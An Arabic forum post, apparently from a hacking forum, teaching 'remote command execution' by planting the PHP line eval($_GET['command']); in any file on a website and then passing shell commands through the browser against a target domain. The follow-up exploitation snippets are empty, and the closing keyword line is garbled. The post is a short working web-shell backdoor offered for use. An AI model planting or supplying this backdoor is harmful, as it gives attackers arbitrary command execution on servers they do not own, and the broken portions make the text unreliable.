command, ثغره, execution, بطريقه, سهله, remote
بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
تعريف الثغره للي ما يعرفها
الثغره تسمح لك بتنفيذ أوامر مباشره على السيرفر عن بعد !
أفتح أي ملف بالموقع وأضيف هذا السطر
كود PHP:
eval($_GET['command']);
الاستغلال :
كود PHP:
وإذا ما نفع جرب :
كود PHP:
وإذا ما نفع جرب :
كود PHP:
واستبدل XX بألامر اللي تبغى تنفذه .. والنتيجه راح تظهر بالمتصفح ::
وطبعاً استبدل site.com بدومين الموقع وfile.php بإسم الملف اللي وضعت فيه السطر ::
.vu eyvi Remote Command Execution f'vdri sigi command execution remote